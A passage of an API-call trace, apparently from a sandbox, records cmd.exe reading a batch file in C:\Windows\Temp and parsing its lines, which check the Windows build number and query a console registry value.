(HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0x30) returned 0x19a8f1e0eb0 [0176.009] GetProcessHeap () returned 0x19a8f1e0000 [0176.009] RtlReAllocateHeap (Heap=0x19a8f1e0000, Flags=0x0, Ptr=0x19a8f1e0eb0, Size=0x20) returned 0x19a8f1eb920 [0176.009] GetProcessHeap () returned 0x19a8f1e0000 [0176.009] RtlSizeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, MemoryPointer=0x19a8f1eb920) returned 0x20 [0176.010] wcsncmp (_String1="_NCS", _String2="/", _MaxCount=0x4) returned 48 [0176.010] GetProcessHeap () returned 0x19a8f1e0000 [0176.010] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0x28) returned 0x19a8f1eb7a0 [0176.010] _wcsnicmp (_String1="_N", _String2="/A", _MaxCount=0x2) returned 48 [0176.010] _wcsnicmp (_String1="_N", _String2="/P", _MaxCount=0x2) returned 48 [0176.010] SetEnvironmentVariableW (lpName="_NCS", lpValue="1") returned 1 [0176.010] GetProcessHeap () returned 0x19a8f1e0000 [0176.010] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f1ef740) returned 1 [0176.010] GetEnvironmentStringsW () returned 0x19a8f1ece20* [0176.010] GetProcessHeap () returned 0x19a8f1e0000 [0176.010] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0xbee) returned 0x19a8f1eeb50 [0176.010] memcpy (in: _Dst=0x19a8f1eeb50, _Src=0x19a8f1ece20, _Size=0xbee | out: _Dst=0x19a8f1eeb50) returned 0x19a8f1eeb50 [0176.011] FreeEnvironmentStringsA (penv="=") returned 1 [0176.011] _get_osfhandle (_FileHandle=1) returned 0x24 [0176.011] SetConsoleMode (hConsoleHandle=0x24, dwMode=0x7) returned 1 [0176.011] _get_osfhandle (_FileHandle=1) returned 0x24 [0176.011] GetConsoleMode (in: hConsoleHandle=0x24, lpMode=0x7ff7bd72960c | out: lpMode=0x7ff7bd72960c) returned 1 [0176.011] _get_osfhandle (_FileHandle=0) returned 0x20 [0176.011] GetConsoleMode (in: hConsoleHandle=0x20, lpMode=0x7ff7bd729608 | out: lpMode=0x7ff7bd729608) returned 1 [0176.011] SetConsoleInputExeNameW () returned 0x1 [0176.011] GetConsoleOutputCP () returned 0x1b5 [0176.012] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x7ff7bd729660 | out: lpCPInfo=0x7ff7bd729660) returned 1 [0176.012] SetThreadUILanguage (LangId=0x0) returned 0x409 [0176.012] CreateFileW (lpFileName="C:\\Windows\\Temp\\MAS_15344413.cmd" (normalized: "c:\\windows\\temp\\mas_15344413.cmd"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x43f9efeea0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x84 [0176.012] _open_osfhandle (_OSFileHandle=0x84, _Flags=8) returned 3 [0176.012] _get_osfhandle (_FileHandle=3) returned 0x84 [0176.012] SetFilePointer (in: hFile=0x84, lDistanceToMove=3572, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0xdf4 [0176.012] GetProcessHeap () returned 0x19a8f1e0000 [0176.013] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f1eb7a0) returned 1 [0176.013] GetProcessHeap () returned 0x19a8f1e0000 [0176.013] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f1eb920) returned 1 [0176.013] GetProcessHeap () returned 0x19a8f1e0000 [0176.013] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f1eb770) returned 1 [0176.013] GetProcessHeap () returned 0x19a8f1e0000 [0176.013] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f1ecd00) returned 1 [0176.013] GetProcessHeap () returned 0x19a8f1e0000 [0176.014] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f1edc50) returned 1 [0176.014] _get_osfhandle (_FileHandle=3) returned 0x84 [0176.014] SetFilePointer (in: hFile=0x84, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0xdf4 [0176.014] ReadFile (in: hFile=0x84, lpBuffer=0x7ff7bd735b80, nNumberOfBytesToRead=0x1fff, lpNumberOfBytesRead=0x43f9efee60, lpOverlapped=0x0 | out: lpBuffer=0x7ff7bd735b80*, lpNumberOfBytesRead=0x43f9efee60*=0x1fff, lpOverlapped=0x0) returned 1 [0176.014] SetFilePointer (in: hFile=0x84, lDistanceToMove=3608, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0xe18 [0176.014] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr="if %winbuild% LSS 10586 set _NCS=0\r\n", cbMultiByte=36, lpWideCharStr=0x7ff7bd7209e0, cchWideChar=8191 | out: lpWideCharStr="if %winbuild% LSS 10586 set _NCS=0\r\n ('ver') do set winbuild=%%G\r\n========================================================================\r\n") returned 36 [0176.014] _get_osfhandle (_FileHandle=3) returned 0x84 [0176.014] GetFileType (hFile=0x84) returned 0x1 [0176.014] _get_osfhandle (_FileHandle=3) returned 0x84 [0176.014] SetFilePointer (in: hFile=0x84, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0xe18 [0176.014] GetProcessHeap () returned 0x19a8f1e0000 [0176.014] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0x4012) returned 0x19a8f1fddc0 [0176.014] GetProcessHeap () returned 0x19a8f1e0000 [0176.014] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0x4010) returned 0x19a8f201de0 [0176.014] GetProcessHeap () returned 0x19a8f1e0000 [0176.014] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0x22) returned 0x19a8f1eb8f0 [0176.014] GetEnvironmentVariableW (in: lpName="winbuild", lpBuffer=0x7ff7bd7296a0, nSize=0x2000 | out: lpBuffer="") returned 0x5 [0176.014] GetProcessHeap () returned 0x19a8f1e0000 [0176.015] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f1eb8f0) returned 1 [0176.015] GetProcessHeap () returned 0x19a8f1e0000 [0176.015] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f201de0) returned 1 [0176.015] GetProcessHeap () returned 0x19a8f1e0000 [0176.016] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f1fddc0) returned 1 [0176.016] _wcsicmp (_String1="if", _String2=")") returned 64 [0176.016] _wcsicmp (_String1="FOR", _String2="if") returned -3 [0176.016] _wcsicmp (_String1="FOR/?", _String2="if") returned -3 [0176.016] _wcsicmp (_String1="IF", _String2="if") returned 0 [0176.016] _wcsicmp (_String1="IF/?", _String2="if") returned 47 [0176.016] GetProcessHeap () returned 0x19a8f1e0000 [0176.016] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0xb0) returned 0x19a8f1ee910 [0176.016] GetProcessHeap () returned 0x19a8f1e0000 [0176.016] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0x16) returned 0x19a8f1ecaa0 [0176.017] GetProcessHeap () returned 0x19a8f1e0000 [0176.017] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0x28) returned 0x19a8f1eb8f0 [0176.017] GetProcessHeap () returned 0x19a8f1e0000 [0176.017] RtlReAllocateHeap (Heap=0x19a8f1e0000, Flags=0x0, Ptr=0x19a8f1eb8f0, Size=0x1e) returned 0x19a8f1eb6b0 [0176.017] GetProcessHeap () returned 0x19a8f1e0000 [0176.017] RtlSizeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, MemoryPointer=0x19a8f1eb6b0) returned 0x1e [0176.017] _wcsicmp (_String1="10586", _String2="/I") returned 2 [0176.017] GetProcessHeap () returned 0x19a8f1e0000 [0176.017] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0xb0) returned 0x19a8f1ee310 [0176.017] GetProcessHeap () returned 0x19a8f1e0000 [0176.017] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0x1c) returned 0x19a8f1eb6e0 [0176.017] _wcsicmp (_String1="ERRORLEVEL", _String2="10586") returned 52 [0176.017] _wcsicmp (_String1="EXIST", _String2="10586") returned 52 [0176.017] _wcsicmp (_String1="CMDEXTVERSION", _String2="10586") returned 50 [0176.017] _wcsicmp (_String1="DEFINED", _String2="10586") returned 51 [0176.017] _wcsicmp (_String1="NOT", _String2="10586") returned 61 [0176.017] GetProcessHeap () returned 0x19a8f1e0000 [0176.017] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0x1c) returned 0x19a8f1eb7a0 [0176.017] _wcsicmp (_String1="LSS", _String2="EQU") returned 7 [0176.017] _wcsicmp (_String1="LSS", _String2="NEQ") returned -2 [0176.017] _wcsicmp (_String1="LSS", _String2="LSS") returned 0 [0176.017] GetProcessHeap () returned 0x19a8f1e0000 [0176.017] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0x1c) returned 0x19a8f1eb8f0 [0176.017] _wcsicmp (_String1="set", _String2=")") returned 74 [0176.018] _wcsicmp (_String1="FOR", _String2="set") returned -13 [0176.018] _wcsicmp (_String1="FOR/?", _String2="set") returned -13 [0176.018] _wcsicmp (_String1="IF", _String2="set") returned -10 [0176.018] _wcsicmp (_String1="IF/?", _String2="set") returned -10 [0176.018] _wcsicmp (_String1="REM", _String2="set") returned -1 [0176.018] _wcsicmp (_String1="REM/?", _String2="set") returned -1 [0176.018] GetProcessHeap () returned 0x19a8f1e0000 [0176.018] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0xb0) returned 0x19a8f1ee9d0 [0176.018] GetProcessHeap () returned 0x19a8f1e0000 [0176.018] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0x18) returned 0x19a8f1ec880 [0176.018] GetProcessHeap () returned 0x19a8f1e0000 [0176.018] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0x20) returned 0x19a8f1eb9e0 [0176.018] _wcsicmp (_String1="ELSE", _String2="\n") returned 91 [0176.018] _tell (_FileHandle=3) returned 3608 [0176.018] _close (_FileHandle=3) returned 0 [0176.018] wcstol (in: _String="10586", _EndPtr=0x43f9efee70, _Radix=0 | out: _EndPtr=0x43f9efee70*="") returned 10586 [0176.018] wcstol (in: _String="10586", _EndPtr=0x43f9efee78, _Radix=0 | out: _EndPtr=0x43f9efee78*="") returned 10586 [0176.018] _get_osfhandle (_FileHandle=1) returned 0x24 [0176.018] SetConsoleMode (hConsoleHandle=0x24, dwMode=0x7) returned 1 [0176.019] _get_osfhandle (_FileHandle=1) returned 0x24 [0176.019] GetConsoleMode (in: hConsoleHandle=0x24, lpMode=0x7ff7bd72960c | out: lpMode=0x7ff7bd72960c) returned 1 [0176.019] _get_osfhandle (_FileHandle=0) returned 0x20 [0176.019] GetConsoleMode (in: hConsoleHandle=0x20, lpMode=0x7ff7bd729608 | out: lpMode=0x7ff7bd729608) returned 1 [0176.020] SetConsoleInputExeNameW () returned 0x1 [0176.020] GetConsoleOutputCP () returned 0x1b5 [0176.020] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x7ff7bd729660 | out: lpCPInfo=0x7ff7bd729660) returned 1 [0176.020] SetThreadUILanguage (LangId=0x0) returned 0x409 [0176.020] CreateFileW (lpFileName="C:\\Windows\\Temp\\MAS_15344413.cmd" (normalized: "c:\\windows\\temp\\mas_15344413.cmd"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x43f9efeea0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x84 [0176.020] _open_osfhandle (_OSFileHandle=0x84, _Flags=8) returned 3 [0176.021] _get_osfhandle (_FileHandle=3) returned 0x84 [0176.021] SetFilePointer (in: hFile=0x84, lDistanceToMove=3608, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0xe18 [0176.021] GetProcessHeap () returned 0x19a8f1e0000 [0176.021] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f1eb9e0) returned 1 [0176.021] GetProcessHeap () returned 0x19a8f1e0000 [0176.021] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f1ec880) returned 1 [0176.021] GetProcessHeap () returned 0x19a8f1e0000 [0176.021] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f1ee9d0) returned 1 [0176.021] GetProcessHeap () returned 0x19a8f1e0000 [0176.022] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f1eb8f0) returned 1 [0176.022] GetProcessHeap () returned 0x19a8f1e0000 [0176.022] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f1eb7a0) returned 1 [0176.022] GetProcessHeap () returned 0x19a8f1e0000 [0176.022] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f1eb6e0) returned 1 [0176.022] GetProcessHeap () returned 0x19a8f1e0000 [0176.022] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f1ee310) returned 1 [0176.022] GetProcessHeap () returned 0x19a8f1e0000 [0176.022] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f1eb6b0) returned 1 [0176.022] GetProcessHeap () returned 0x19a8f1e0000 [0176.022] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f1ecaa0) returned 1 [0176.022] GetProcessHeap () returned 0x19a8f1e0000 [0176.022] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f1ee910) returned 1 [0176.023] _get_osfhandle (_FileHandle=3) returned 0x84 [0176.023] SetFilePointer (in: hFile=0x84, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0xe18 [0176.023] ReadFile (in: hFile=0x84, lpBuffer=0x7ff7bd735b80, nNumberOfBytesToRead=0x1fff, lpNumberOfBytesRead=0x43f9efee60, lpOverlapped=0x0 | out: lpBuffer=0x7ff7bd735b80*, lpNumberOfBytesRead=0x43f9efee60*=0x1fff, lpOverlapped=0x0) returned 1 [0176.023] SetFilePointer (in: hFile=0x84, lDistanceToMove=3715, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0xe83 [0176.023] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr="if %winbuild% GEQ 10586 reg query \"HKCU\\Console\" /v ForceV2 %nul2% | find /i \"0x0\" %nul1% && (set _NCS=0)\r\n", cbMultiByte=107, lpWideCharStr=0x7ff7bd7209e0, cchWideChar=8191 | out: lpWideCharStr="if %winbuild% GEQ 10586 reg query \"HKCU\\Console\" /v ForceV2 %nul2% | find /i \"0x0\" %nul1% && (set _NCS=0)\r\n===============================\r\n") returned 107 [0176.023] _get_osfhandle (_FileHandle=3) returned 0x84 [0176.023] GetFileType (hFile=0x84) returned 0x1 [0176.023] _get_osfhandle (_FileHandle=3) returned 0x84 [0176.023] SetFilePointer (in: hFile=0x84, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0xe83 [0176.023] GetProcessHeap () returned 0x19a8f1e0000 [0176.023] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0x4012) returned 0x19a8f1fddc0 [0176.023] GetProcessHeap () returned 0x19a8f1e0000 [0176.023] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0x4010) returned 0x19a8f201de0 [0176.023] GetProcessHeap () returned 0x19a8f1e0000 [0176.023] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0x22) returned 0x19a8f1eb800 [0176.023] GetEnvironmentVariableW (in: lpName="winbuild", lpBuffer=0x7ff7bd7296a0, nSize=0x2000 | out: lpBuffer="") returned 0x5 [0176.023] GetProcessHeap () returned 0x19a8f1e0000 [0176.024] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f1eb800) returned 1 [0176.024] GetProcessHeap () returned 0x19a8f1e0000 [0176.024] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f201de0) returned 1 [0176.024] GetProcessHeap () returned 0x19a8f1e0000 [0176.024] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0x4010) returned 0x19a8f201de0 [0176.024] GetProcessHeap () returned 0x19a8f1e0000 [0176.024] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0x1a) returned 0x19a8f1eb6b0 [0176.024] GetEnvironmentVariableW (in: lpName="nul2", lpBuffer=0x7ff7bd7296a0, nSize=0x2000 | out: lpBuffer="") returned 0x5 [0176.024] GetProcessHeap () returned 0x19a8f1e0000 [0176.024] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f1eb6b0) returned 1 [0176.024] GetProcessHeap () returned 0x19a8f1e0000 [0176.025] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f201de0) returned 1 [0176.025] GetProcessHeap () returned 0x19a8f1e0000 [0176.025] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0x4010) returned 0x19a8f201de0 [0176.025] GetProcessHeap () returned 0x19a8f1e0000 [0176.025] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0x1a) returned 0x19a8f1eb770 [0176.025] GetEnvironmentVariableW (in: lpName="nul1", lpBuffer=0x7ff7bd7296a0, nSize=0x2000 | out: lpBuffer="") returned 0x5 [0176.025] GetProcessHeap () returned 0x19a8f1e0000 [0176.025] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f1eb770) returned 1 [0176.025] GetProcessHeap () returned 0x19a8f1e0000 [0176.026] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f201de0) returned 1 [0176.026] GetProcessHeap () returned 0x19a8f1e0000 [0176.026] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f1fddc0) returned 1 [0176.026] _wcsicmp (_String1="if", _String2=")") returned 64 [0176.026] _wcsicmp (_String1="FOR", _String2="if") returned -3 [0176.026] _wcsicmp (_String1="FOR/?", _String2="if") returned -3 [0176.026] _wcsicmp (_String1="IF", _String2="if") returned 0 [0176.026] _wcsicmp (_String1="IF/?", _String2="if") returned 47 [0176.026] GetProcessHeap () returned 0x19a8f1e0000 [0176.026] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0xb0) returned 0x19a8f1edb90 [0176.026] GetProcessHeap () returned 0x19a8f1e0000 [0176.026] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0x16) returned 0x19a8f1ec940 [0176.026] GetProcessHeap () returned 0x19a8f1e0000 [0176.027] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0x28) returned 0x19a8f1eb920 [0176.027] GetProcessHeap () returned 0x19a8f1e0000 [0176.027] RtlReAllocateHeap (Heap=0x19a8f1e0000, Flags=0x0, Ptr=0x19a8f1eb920, Size=0x1e) returned 0x19a8f1eb860 [0176.027] GetProcessHeap () returned 0x19a8f1e0000 [0176.027] RtlSizeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, MemoryPointer=0x19a8f1eb860) returned 0x1e [0176.027] _wcsicmp (_String1="10586", _String2="/I") returned 2 [0176.027] GetProcessHeap () returned 0x19a8f1e0000 [0176.027] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0xb0) returned 0x19a8f1edc50 [0176.027] GetProcessHeap () returned 0x19a8f1e0000 [0176.027] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0x1c) returned 0x19a8f1eb6b0 [0176.027] _wcsicmp (_String1="ERRORLEVEL", _String2="10586") returned 52 [0176.027] _wcsicmp (_String1="EXIST", _String2="10586") returned 52 [0176.027] _wcsicmp (_String1="CMDEXTVERSION", _String2="10586") returned 50 [0176.027] _wcsicmp (_String1="DEFINED", _String2="10586") returned 51 [0176.027] _wcsicmp (_String1="NOT", _String2="10586") returned 61 [0176.027] GetProcessHeap () returned 0x19a8f1e0000 [0176.027] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0x1c) returned 0x19a8f1eb980 [0176.027] _wcsicmp (_String1="GEQ", _String2="EQU") returned 2 [0176.027] _wcsicmp (_String1="GEQ", _String2="NEQ") returned -7 [0176.027] _wcsicmp (_String1="GEQ", _String2="LSS") returned -5 [0176.027] _wcsicmp (_String1="GEQ", _String2="LEQ") returned -5 [0176.027] _wcsicmp (_String1="GEQ", _String2="GTR") returned -15 [0176.027] _wcsicmp (_String1="GEQ", _String2="GEQ") returned 0 [0176.027] GetProcessHeap () returned 0x19a8f1e0000 [0176.027] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0x1c) returned 0x19a8f1eb740 [0176.027] _wcsicmp (_String1="reg", _String2=")") returned 73 [0176.027] _wcsicmp (_String1="FOR", _String2="reg") returned -12 [0176.027] _wcsicmp (_String1="FOR/?", _String2="reg") returned -12 [0176.028] _wcsicmp (_String1="IF", _String2="reg") returned -9 [0176.028] _wcsicmp (_String1="IF/?", _String2="reg") returned -9 [0176.028] _wcsicmp (_String1="REM", _String2="reg") returned 6 [0176.028] _wcsicmp (_String1="REM/?", _String2="reg") returned 6 [0176.028] GetProcessHeap () returned 0x19a8f1e0000 [0176.028] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0xb0) returned 0x19a8f1ede90 [0176.028] GetProcessHeap () returned 0x19a8f1e0000 [0176.028] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0x18) returned 0x19a8f1ec660 [0176.028] GetProcessHeap () returned 0x19a8f1e0000 [0176.028] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0x54) returned 0x19a8f1f8ca0 [0176.028] GetProcessHeap () returned 0x19a8f1e0000 [0176.028] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0x38) returned 0x19a8f1e0b30 [0176.028] GetProcessHeap () returned 0x19a8f1e0000 [0176.028] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0x18) returned 0x19a8f1ecb20 [0176.028] GetProcessHeap () returned 0x19a8f1e0000 [0176.028] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0x56) returned 0x19a8f1f86a0 [0176.028] GetProcessHeap () returned 0x19a8f1e0000 [0176.028] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0xb0) returned 0x19a8f1edf50 [0176.028] _wcsicmp (_String1="FOR", _String2="find") returned 6 [0176.028] _wcsicmp (_String1="FOR/?", _String2="find") returned 6 [0176.028] _wcsicmp (_String1="IF", _String2="find") returned 3 [0176.028] _wcsicmp (_String1="IF/?", _String2="find") returned 3 [0176.028] _wcsicmp (_String1="REM", _String2="find") returned 12 [0176.028] _wcsicmp (_String1="REM/?", _String2="find") returned 12 [0176.028] GetProcessHeap () returned 0x19a8f1e0000 [0176.028] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0xb0) returned 0x19a8f1ee550 [0176.028] GetProcessHeap () returned 0x19a8f1e0000 [0176.028] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0x1a) returned 0x19a8f1eb950 [0176.028] GetProcessHeap () returned 0x19a8f1e0000 [0176.028] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0x26) returned 0x19a8f1eb6e0 [0176.029] GetProcessHeap () returned 0x19a8f1e0000 [0176.029] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0x38) returned 0x19a8f1e0db0 [0176.029] GetProcessHeap () returned 0x19a8f1e0000 [0176.029] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0x18) returned 0x19a8f1ecd20 [0176.029] GetProcessHeap () returned 0x19a8f1e0000 [0176.029] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0x28) returned 0x19a8f1eb8f0 [0176.029] GetProcessHeap () returned 0x19a8f1e0000 [0176.029] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0xb0) returned 0x19a8f1ee250 [0176.029] GetProcessHeap () returned 0x19a8f1e0000 [0176.029] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0xb0) returned 0x19a8f1ee190 [0176.029] _wcsicmp (_String1="FOR", _String2="set") returned -13 [0176.029] _wcsicmp (_String1="FOR/?", _String2="set") returned -13 [0176.029] _wcsicmp (_String1="IF", _String2="set") returned -10 [0176.029] _wcsicmp (_String1="IF/?", _String2="set") returned -10 [0176.029] _wcsicmp (_String1="REM", _String2="set") returned -1 [0176.029] _wcsicmp (_String1="REM/?", _String2="set") returned -1 [0176.029] GetProcessHeap () returned 0x19a8f1e0000 [0176.029] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0xb0) returned 0x19a8f1edd10 [0176.029] GetProcessHeap () returned 0x19a8f1e0000 [0176.029] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0x18) returned 0x19a8f1ec6a0 [0176.029] GetProcessHeap () returned 0x19a8f1e0000 [0176.029] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0x20) returned 0x19a8f1eb710 [0176.029] _wcsicmp (_String1="ELSE", _String2="\n") returned 91 [0176.029] _tell (_FileHandle=3) returned 3715 [0176.029] _close (_FileHandle=3) returned 0 [0176.030] wcstol (in: _String="10586", _EndPtr=0x43f9efee70, _Radix=0 | out: _EndPtr=0x43f9efee70*="") returned 10586 [0176.030] wcstol (in: _String="10586", _EndPtr=0x43f9efee78, _Radix=0 | out: _EndPtr=0x43f9efee78*="") returned 10586 [0176.030] GetProcessHeap () returned 0x19a8f1e0000 [0176.030] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0x48) returned 0x19a8f1f9180 [0176.030] _pipe (in: _PtHandles=0x19a8f1f9190, _PipeSize=0x0, _TextMode=32768 | out: _PtHandles=0x19a8f1f9190) returned 0 [0176.030] _dup (_FileHandle=1) returned 5 [0176.030] _dup2 (_FileHandleSrc=4, _FileHandleDst=1) returned 0 [0176.030] _close (_FileHandle=4) returned 0 [0176.030] _wcsicmp (_String1="reg", _String2="DIR") returned 14 [0176.030] _wcsicmp (_String1="reg", _String2="ERASE") returned 13 [0176.030] _wcsicmp (_String1="reg", _String2="DEL") returned 14 [0176.030] _wcsicmp (_String1="reg", _String2="TYPE") returned -2 [0176.030] _wcsicmp (_String1="reg", _String2="COPY") returned 15 [0176.030] _wcsicmp (_String1="reg", _String2="CD") returned 15 [0176.030] _wcsicmp (_String1="reg", _String2="CHDIR") returned 15 [0176.030] _wcsicmp (_String1="reg", _String2="RENAME") returned -7 [0176.030] _wcsicmp (_String1="reg", _String2="REN") returned -7 [0176.030] _wcsicmp (_String1="reg", _String2="ECHO") returned 13 [0176.030] _wcsicmp (_String1="reg", _String2="SET") returned -1 [0176.031] _wcsicmp (_String1="reg", _String2="PAUSE") returned 2 [0176.031] _wcsicmp (_String1="reg", _String2="DATE") returned 14 [0176.031] _wcsicmp (_String1="reg", _String2="TIME") returned -2 [0176.031] _wcsicmp (_String1="reg", _String2="PROMPT") returned 2 [0176.031] _wcsicmp (_String1="reg", _String2="MD") returned 5 [0176.031] _wcsicmp (_String1="reg", _String2="MKDIR") returned 5 [0176.031] _wcsicmp (_String1="reg", _String2="RD") returned 1 [0176.031] _wcsicmp (_String1="reg", _String2="RMDIR") returned -8 [0176.031] _wcsicmp (_String1="reg", _String2="PATH") returned 2 [0176.031] _wcsicmp (_String1="reg", _String2="GOTO") returned 11 [0176.031] _wcsicmp (_String1="reg", _String2="SHIFT") returned -1 [0176.031] _wcsicmp (_String1="reg", _String2="CLS") returned 15 [0176.031] _wcsicmp (_String1="reg", _String2="CALL") returned 15 [0176.031] _wcsicmp (_String1="reg", _String2="VERIFY") returned -4 [0176.031] _wcsicmp (_String1="reg", _String2="VER") returned -4 [0176.031] _wcsicmp (_String1="reg", _String2="VOL") returned -4 [0176.031] _wcsicmp (_String1="reg", _String2="EXIT") returned 13 [0176.031] _wcsicmp (_String1="reg", 